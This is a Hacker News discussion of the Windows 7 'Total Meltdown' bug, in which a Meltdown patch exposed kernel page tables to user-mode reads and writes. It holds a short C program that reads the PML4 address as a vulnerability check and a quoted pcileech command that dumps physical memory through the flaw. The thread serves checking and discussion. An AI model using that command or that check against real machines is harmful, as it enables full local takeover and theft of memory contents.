
Windows 7 patch for Meltdown enabled arbitrary reads and writes in kernel memory - romac
http://blog.frizk.net/2018/03/total-meltdown.html?m=1
======
lmilcin
This is what happens when devs are presented with a very complicated problem,
an extremely short deadline and an enormous amount of pressure.

~~~
gruez
>extremely short deadline

they had 6 months.

~~~
maltalex
> they had 6 months.

You say that like 6 months is automatically a lot of time. "She had 6 months
to give birth". Yeah, only it takes 9, so 6 is short.

Consider the scope and depth of the issue and the fact that they probably
couldn't involve too many people on this effort.

~~~
chris_wot
The Linux kernel developers came up with a decent solution, how can it be that
they can do this and the Microsoft developers cannot?

~~~
rxhernandez
Is Windows written the exact same way as Linux? Never underestimate the amount
of technical debt that can be holding a team down.

~~~
chris_wot
It appears not, if such a bad bug can get through all the way to release.

~~~
Raymonf
"Linux" had a bug in which you could log into a system by pressing backspace
28 times a few years ago. And by Linux, I meant GRUB[1], and in turn, (many)
Linux systems.

We're comparing Linux and Windows, an operating system that contains 3.5
million files[2] (of course, not just the kernel in this case). That isn't
really fair. Code is as perfect as humans can make it, and it certainly does
not help that there's so much to take into account.

[1] [http://hmarco.org/bugs/CVE-2015-8370-Grub2-authentication-by...](http://hmarco.org/bugs/CVE-2015-8370-Grub2-authentication-bypass.html)

[2] [https://arstechnica.com/gadgets/2018/03/building-windows-4-m...](https://arstechnica.com/gadgets/2018/03/building-windows-4-million-commits-10-million-work-items/)

~~~
pecg
This GRUB bug you are talking about is not a kernel problem, though. On a side
note, I'm going to read the links you provided, as I want to see whether
encrypted root partitions could also be compromised. I suspect not.

------
caf
A really simple test you can compile with cygwin - if it doesn't crash, the
bug is present:

    
    
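      #include <stdio.h>
      
      int main(void)
      {
              /* Per the linked article: virtual address of the PML4 on Windows 7 x64. */
              volatile unsigned long *ptr = (volatile unsigned long *)0xFFFFF6FB7DBED000;
      
              /* On an unaffected system this user-mode read faults and the program crashes. */
              printf("%lx\n", *ptr);
              return 0;
      }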

~~~
mgerdts
I seem to be unable to find a patch that will make it so that this doesn't
run. Windows Update says that I have all required patches. I first tried
KB4088875. That didn't cause this program to fail. Then I tried "2018-03
Preview of Monthly Quality Rollup for Windows 7 for x64-based Systems
(KB4088881)", which was only a recommended update. That didn't help either.

~~~
mysterypie
Same for me. I tested a Windows 7 x64 system which has all security patches,
but caf's "really simple test" above still runs, which seems to indicate that
the bug still exists. Same as you, I applied KB4088881, which was the only
pending update, but it made no difference.

Also, I tried the command from the original article:

 _pcileech.exe dump -out memorydump.raw -device totalmeltdown -v -force_

This creates a 5GB file which does look like a raw memory dump. I'm not sure how
to interpret this; I don't know what the behavior should be with or without
the bug.

------
well_done
Well, let's take a breath and be grateful that even MS can mess something like
this up.

One dev or 1000, who cares, whatever they chose did not work particularly
well. Are "they" to blame? Yes. Are the engineers to blame? Probably not. Is
management the culprit? We don't know.

What's left? Next time your customers bug you about some random downtime
caused by an overworked datacenter intern, don't feel stressed. Take the time
to remember that even if you would've had billions of dollars, years of
experience and thousands of employees, you could've messed up, just like MS
did :)

~~~
gerdesj
"Take the time to remember that even if you would've [sic] had billions of
dollars, years of experience and thousands of employees, you could've messed
up, just like MS did :)"

When you are the direct, contracted, IT support for a company then you _do_
have responsibilities. You might be considered responsible for timely delivery
of patches - a fair argument in court I think. Mitigations might involve
helpdesk logs as well as contracts.

well_done: Your tone comes across as BOFH. I'm possibly a simple PHB who owns
an electric cattle prod that is wired up to the mains (three phase) but I
prefer to get sign off for a project via work committed and not threat done.

~~~
freehunter
>Your tone comes across as BOFH

I didn't read it like that, and I'm usually the first to read things
negatively. I read it as motivational: don't feel bad about your own mistakes,
even the big guys with tons of money and a lot of really smart people mess up
sometimes. So cut yourself some slack and just do the best you can.

~~~
gerdesj
"Next time your customers bug you about some random downtime caused by an
overworked datacenter intern, don't feel stressed. Take the time to remember
that even if you would've had billions of dollars, years of experience and
thousands of employees, you could've messed up, just like MS did :)"

I missed the :) which might sound a bit naff now but was probably intended to
deflect comments like mine. Hit taken. However I did invoke BOFH which is (I
hope) normally seen as an indication that a comment is not to be taken too
seriously.

EDIT: BOFH => Negative - nope, not here.

~~~
freehunter
You're correct, I read "BOFH" as a negative. I apologize since you did not
mean it in that way. I never thought that BOFH would ever be considered the
good guy in the story :)

------
amluto
Yeesh. I didn’t know that Windows still uses the self-referential page table
trick. This makes me very nervous, especially since they seem to keep it
mapped in the user page tables. This seems likely to poke a big hole in ASLR
if nothing else. It’s a _huge_ target for write-what-where exploits.

~~~
ryuuchin
They changed it in Windows 10 (RS1 IIRC)[1].

[1] [http://www.alex-ionescu.com/?p=323](http://www.alex-ionescu.com/?p=323)

~~~
caf
The tl;dr is that they're still using the self-referential page table trick,
however the PTE_BASE is now randomised at runtime with dynamic fixups.

------
tambourine_man
Security is hard. I don't think I'd have the stomach to work on kernel or
encryption code.

The worst I can do here in userland is crash or delete data. And that's pretty
bad already.

~~~
HankB99
I dunno. I think a program that produces subtly wrong results is the worst. It
reminds me of a project I once did. It involved producing reports from tens of
thousands of records including summing some of the fields. I was constrained
to work on Windows so I put the data into a SQL Server database and used MS
Access to produce very nice looking reports. I reviewed the reports and
everything "looked OK" so I handed them to the users for approval. The users
were accountants. They added up the partial sums and pointed out that the
results were only approximately correct. It turns out that MS Access is not so
good at arithmetic. I restructured the reports to perform the arithmetic in
the SQL queries and just use MS Access to format it for a pretty page. I also
checked the arithmetic before handing the next revision over.

Better testing (as in more than a superficial glance) would have caught this
before review, but there is always the possibility that subtle bugs can
sneak past even well-thought-out tests.

Just my own experience and opinion.

~~~
NamTaf
Agreed. I was doing a derailment investigation a number of years ago which
involved digging through event recorder logfiles. The event recorder is such
that it writes an entry every second but only updates GPS every 20 seconds, so
it writes GPS coordinates against every 20th entry.

What I discovered was that the event recorders on certain locomotives updated
GPS at the 20th second rather than the 0th second. This meant that the GPS
entry next to each line was in fact offset by 20 seconds - i.e. the entry for
02:11:40 was in fact what was sampled at 02:11:20. I think they must've held
the GPS coordinate in memory somewhere but updated it AFTER writing that
second's entry, so they wrote 02:11:20 whilst holding 02:11:00's GPS, then
updated it, but then wrote that update at 02:11:40, etc. This was a fault
with the design of the event recorders, not just one loco, as it occurred on
each of that type that I looked at.

This confused me so much because it looked right - it was in the right general
location, it was updating, etc. - but for a solid few days I did a bunch of
analysis thinking the train was in a different location to where it really
was. I eventually picked up on it when subtle things kept not adding up and
verified it by watching another loco come to a stop and then seeing the GPS
keep moving for a bit afterwards until it settled.

I agree with you, subtly wrong results are the worst.

------
blinkingled
I guess upgrade to Windows 10 is the message Microsoft is trying to get out
here?

Laying off all those QA and testing people will have some downside - MS seems
to be letting older versions take the hit.

~~~
Silhouette
Perhaps. However, Microsoft has published very clear guidance on how long
previous versions of Windows would receive support for, specifically including
the period for security updates. Doing what you're describing is effectively
reneging on that deal, and that sends a very different kind of message.

~~~
blinkingled
Sure, I have a hard time believing MS would purposefully screw their Win 7/8
enterprise customers - but the issue at hand suggests it's at the very least a
byproduct of their new strategy of focusing on Win 10 and the decision to make
do with fewer QA staff and testers by involving more end users in testing. Thus
Win 7 users end up with slower, less tested patches and no hardware support
backports. To be fair only the less tested patches sound terrible.

------
computator
Has anyone actually confirmed this bug? The author seems to be an expert in
low-level DMA security, but it would be nice to see independent confirmation.
Reading through the comments so far, it doesn't seem so. The closest anyone
comes is this:
[https://news.ycombinator.com/item?id=16693599](https://news.ycombinator.com/item?id=16693599)

I was hoping to see someone who said:

(1) I tested a Windows 7 X64 machine without the Meltdown patch (pre-December
2017) and couldn't read arbitrary memory.

(2) Next I tested with Microsoft's Meltdown patch KBnnnnnnn (Jan or Feb 2018)
and _could_ read arbitrary memory. The system is insecure.

(3) I then tested with Microsoft patch KBnnnnnnn (March 2018) and can no
longer read arbitrary memory. They fixed it.

~~~
caf
I did use a modified version of my short test program to actually test
modifying the page tables to read a chosen physical address, which worked just
fine. The bug is real.

~~~
BrianG61UK
And KBnnnnnn that fixes it is which KB?

------
lifeisstillgood
My take on this is a little bit dumb, but, once upon a time, many moons ago, I
thought I understood the CPU I acted upon. I could peek and poke and look up
what was where. I mostly wanted faster, but what I got was more complex.

Is there a way to just get faster without the complexity? What would a new CPU
architecture and OS look like if we started again? Is there room for open
hardware to save us all?

~~~
exikyut
Superscalar processing was unfortunately a major step forward in terms of
performance.

The answer in [https://stackoverflow.com/questions/8389648/how-do-i-achieve...](https://stackoverflow.com/questions/8389648/how-do-i-achieve-the-theoretical-maximum-of-4-flops-per-cycle/8402970) is interesting; I'm
particularly fascinated by the temperature warning (the answer author's CPU
got to 76C in testing).

My CPU's sitting at 30C right now. It maybe climbs to 48C if Chrome's being
stupid, and 50+C if I'm doing something mildly taxing. I've never made it go
beyond 60C IIRC.

So, modern CPUs are _so_ efficient that they're simply just never hitting
their maximum throughput. I think that's pretty incredible.

The sad thing about CPUs that don't use modern (superscalar, multi-stage,
microarched, etc) design is that they just can't keep up.

And people's OCD about speed and (more frequently) parallelization nowadays
drives what they'll buy. Something had better have a killer feature if it
isn't fast or highly parallel.

So it's possible, but a huge headache. Whatever you built would likely be
highly purpose-specific.

------
avhon1
The article says that this vulnerability was patched in March 2018, so at
least there's that.

~~~
gerdesj
I'm still working on a bloody huge list of customer updatathons for Meltdown
and Speccy. Now I have to go back around a load of them that I have already
patched and find the Win 7s and 2008r2s and update those before I continue.

Oh well, it gives me something to do of an evening 8)

~~~
Someone1234
Why are you manually patching workstations? WSUS allows central management
(inc. zone deployment), but even in Windows 7's default state it should apply
these updates without intervention.

2008R2 I can see doing it by hand, but Windows 7 clients is odd. Particularly
as it seems to be taking you two months to apply urgent patches.

~~~
gerdesj
Some of my customer VMs are Windows 7 - Veeam proxies for example. I also take
backups quite seriously. Yes this is all a bit manual in some cases.

(Nearly) All of them are on the end of an IPSEC VPN that I can get at from
home via the office web proxy and another VPN or via magic. Some of them have
192.168.0.0/24 or 192.168.1.0/24 - those are on the end of OpenVPN. I wrote
this:
[https://doc.pfsense.org/index.php/OpenVPN_NAT_subnets_with_s...](https://doc.pfsense.org/index.php/OpenVPN_NAT_subnets_with_same_IP_range).
You have no idea what networking is about until you've had to do that sort
of nonsense a few times 8)

I don't have the luxury of one WSUS to manage, we have loads of the bloody
things. Some customers have pretty skilled local IT depts, some have somewhat
vocal users that accuse you of resetting their passwords after spending hours
doing way more than they have paid for and would not understand what you are
on about in the first place. I love them all equally as any parent would ...

When I get bored of watching Windows Update I run apt update && apt upgrade &&
reboot on a few machines and keep a weather eye on the monitoring system. When
I get really bored, I run up yaourt on my laptop or my office PC. When I've
got a newly installed Win system or two to patch, I fire up a few emerge -Uvh
--deep --newuse --keep-going @world sessions (I'm not really joking here) or
run up genkernel.

Yes, there is the default state designed by .... bbzzzzrrt .... soz, lost it,
and then there is reality. Could I also remind you that there is rather more
to patching than WSUS:

* Firmware - Dell, HPE and Co have had to do rather a lot of work here and had to start again in Jan when Intel dropped the ball
* Hypervisors - I generally see VMware - that's a lot of patching and don't forget that some of them were buggered, so need excluding.
* VM vHardware versions - yep, all those little lovelies have their own hardware types to worry about
* "My fooking factory runs 24x7 - what are you going to do about it?" .... "Yes but you didn't go for the full cluster version _sigh_ I'll see what I can do" ...

You think I'm odd! No mate, my little company are well aware of automation and
use it where we can but we are pragmatic and have to deal with a lot of
reality.

We could of course bind our customers to our iron will and enforce our policy
and stuff. They would not work on weekends or other odd hours. They would not
insist on doing things their way and they absolutely would pay us on time -
they generally do 8)

------
0x0
Wow, that's crazy. About as bad as it gets for local privesc!

------
pishpash
So why does this only affect Windows 7?

~~~
cptskippy
Probably because after Windows 7 they started a kernel rewrite, known as
MinWin, to extricate the Win32 Userland tendrils that had crept into the
Kernel since the NT days.

[https://en.wikipedia.org/wiki/MinWin](https://en.wikipedia.org/wiki/MinWin)

~~~
container
The article doesn't seem to indicate that MinWin started after Windows 7. If
there has been a fundamental kernel change effort after Win7 (I'm not aware of
one), maybe it has a different name?

~~~
cptskippy
You're right, for some reason my brain said Vista came after Windows 7. Given
that 7 came after Vista my theory makes no sense.

------
rocqua
Any indication of whether this was actually exploited? I really don't want to
do a full key-rotation routine.

Also, does Windows 7 map the entire address space into kernel memory? That is,
would this have enabled direct memory access to other processes?

~~~
MarkSweep
My understanding of the article is that the page table itself was writable. So
an attacking process could map in the entire memory of the computer and
read everything, regardless of what was in the kernel's version of the page table.

~~~
caf
The attacking process could also put whatever code it wanted into the kernel,
and so give itself full access to everything on disk as well.

------
daveheq
This sounds contradictory:

"Only Windows 7 x64 systems patched with the 2018-01 or 2018-02 patches are
vulnerable. If your system isn't patched since December 2017 or if it's
patched with the 2018-03 patches or later it will be secure."

"I discovered this vulnerability just after it had been patched in the 2018-03
Patch Tuesday. I have not been able to correlate the vulnerability to known
CVEs or other known issues."

------
yuhong
The fun thing is that even MS admitted it breaks non-PAE kernels and pre-SSE2
processors (in the most recent one). I have been fighting a similar bug in one
of the Jet 4.0 patches for a while now.

------
kerng
Sounds like Microsoft found and patched it independently already. Afterwards
someone else (blog author) found it too, maybe by reversing the patch from
patch Tuesday.

------
ams6110
Predictable. Fixing old bugs introduces new bugs.

~~~
Arwill
I wonder how long Windows as a piece of software can continue to grow. I looked
at the list of services, and it's crazy. So much exotic functionality, and so
much of it I don't ever need. Then the file system: there are even hidden
folders managed by Windows itself that just grow and take up space. All that
adds to complexity and increases the probability of bugs. I wish there was a
version of the OS that just shed all that unnecessary functionality and
returned to basics. Something like a minimalist Linux distro, but able to run
all games and office.

~~~
ksk
Hmm, but it appears that windows has fewer security bugs than Linux. Is there
any data showing otherwise?

(TBH, this is already unfair, comparing the kernel with an entire OS)

[https://www.cvedetails.com/top-50-products.php](https://www.cvedetails.com/top-50-products.php)

[https://www.cvedetails.com/product/47/Linux-Linux-Kernel.htm...](https://www.cvedetails.com/product/47/Linux-Linux-Kernel.html?vendor_id=33)

[https://www.cvedetails.com/product/32238/Microsoft-Windows-1...](https://www.cvedetails.com/product/32238/Microsoft-Windows-10.html?vendor_id=26)

[https://www.cvedetails.com/product/17153/Microsoft-Windows-7...](https://www.cvedetails.com/product/17153/Microsoft-Windows-7.html?vendor_id=26)

[https://www.cvedetails.com/product/22318/Microsoft-Windows-8...](https://www.cvedetails.com/product/22318/Microsoft-Windows-8.html?vendor_id=26)

~~~
gerdesj
"Hmm, but it appears that windows has fewer security bugs than Linux. Is there
any data showing otherwise?"

Yes, I think you are being a bit of a noddy comparing a kernel with an entire
OS. That said, all software has bugs. Blimey, how on earth can you compare the
paltry 3000000000000 odd source files of Windows tucked up in Git with the
gazillions of source files that comprise a modern Linux based system (let
alone the BSDs etc)?

I will simply mention here that when I update an LTS Ubuntu or Debian box I
run "apt update && apt upgrade && reboot" (or use a GUI if I'm bored) and it
takes a few seconds to minutes to update the entire system. Everything. That
includes Java, Flash, Office suites, graphics drivers, USB drivers, printer
drivers, CAD suites, database servers, web servers, PHP, Python, Perl, Rust,
Go, ... need I go on. Everything. The same happens when I use pacman or yaourt,
or emerge, or yum, or rpm or whatever.

I'm personally CREST accredited, so have a fair idea about security and prefer
to spend my time doing stuff and not waiting for updates to install (if I can
even find them) - you?

~~~
exikyut
FWIW WinXP is officially quoted as 45 million lines of code
([https://www.facebook.com/windows/posts/155741344475532](https://www.facebook.com/windows/posts/155741344475532)),
everyone's decided Win10 is 5-10 (some say 15-20) million more.

I've been meaning to SLOCcount Linux sometime, actually!

Having said that, I don't think it'll be 45M LOC. The kernel is 20M LOC
([https://www.linuxcounter.net/statistics/kernel](https://www.linuxcounter.net/statistics/kernel)).
Chrome is 18M (excluding blank lines/comments)
([https://www.openhub.net/p/chrome/analyses/latest/languages_s...](https://www.openhub.net/p/chrome/analyses/latest/languages_summary)).
LibreOffice is 9M LOC
([https://www.openhub.net/p/libreoffice](https://www.openhub.net/p/libreoffice)).

And then I found out that KDE is 60M LOC!!
([https://www.openhub.net/p/kde](https://www.openhub.net/p/kde))

GNOME is 9M
([https://www.openhub.net/p/gnome](https://www.openhub.net/p/gnome)).

But I'm guessing those two stats compare just the base desktop environment in
GNOME's case with, in KDE's case, all the productivity apps (including KWrite
et al) and system libraries (including QtWebKit et al). This must be kept in
mind.

TL;DR, an incredibly basic system with _just_ a word processor and web
browser, and maybe a minimal window manager on top, would be 47M. Adding KDE in
makes it 107M - but you're almost never going to use all of it (whereas with
Chrome and LibreOffice some large proportion of that 18M and 9M is loaded into
RAM and potentially targetable).

~~~
gerdesj
Mate, the sheer amount of LoC in any modern system is nearly uncountable. I
have been a serious Gentoo aficionado for many years. My lap has been burnt
for hours simply compiling Firefox or LO. They are both massive and they are
only two apps.

If you want to SLOC Linux then download it
[https://www.kernel.org/](https://www.kernel.org/) and help yourself. Why not
look here as well [https://www.freebsd.org](https://www.freebsd.org) and
others - those are my mates, and good ones.

------
stefan_
I guess we now know that of the 3000000 files, or whatever it was they boasted
about, not a lot are some sort of unit test.

~~~
egeozcan
How can you test against an unknown bug?

~~~
asdsa5325
Testing to make sure you can't read from somewhere you are not supposed to
read from seems like a pretty obvious test for an OS.

~~~
tedunangst
There are lots of places you're not supposed to read from. Does any operating
system have 100% test coverage of addresses that aren't supposed to be
readable?

~~~
PeterisP
IDK, there's quite a narrow whitelisted known range of addresses that _should_
be readable by your process; you could (and should) certainly have a simple
automated test that tries to read everything with the expectation that
it should succeed only in known cases.

------
gerdesj
I'm just about to add this to our Risk Register. I'm thinking of 0.01 x 100
(our scoring system is 1-3 x 1-3.) That means I think it is very unlikely but
seriously (I will probably offend someone if I let loose here) nasty.

~~~
vardump
So you'd give this 1 on a scale from 1 to 3? Presumably 3 being the most
serious.

That doesn't make any sense. If this bug is present, this is instant total
control of a PC. That's as bad as it gets.

~~~
stordoff
Unless OP edited his post, he appears to be scoring it 100 (i.e. it's off the
scale).

~~~
vardump
I misread grandparent post. The scale is 1-3 x 1-3, in other words, from 1 to
9.

0.01 * 100 is 1.

~~~
stordoff
Ah, I see. I was reading it as two axes, not a product.

~~~
gerdesj
Yes a product although the term "two axes" works as well. It's a pretty common
way of quantifying "risk" into something that you can tabulate and form a todo
list. You list your risks and give each one a score from 0-9 that is made up
of "chance of happening" x "business impact or importance or whatever". You
could score either as zero as well which will obviously cause the total score
to be zero.

I'll be changing our Risk Reg soon to become a Risks and Opportunities
Register after a discussion in our last ISO 9001 audit. Not sure how the
scoring scheme will work for that yet.

This may look like a bit of a silly pseudo formal exercise but it really does
help with decision making. There's nothing wrong with bending the scores
either, if you are open about it. It is simply a way of prioritising a list of
things to do in the end.

I have to be a PHB sometimes as well as a sysadmin 8)

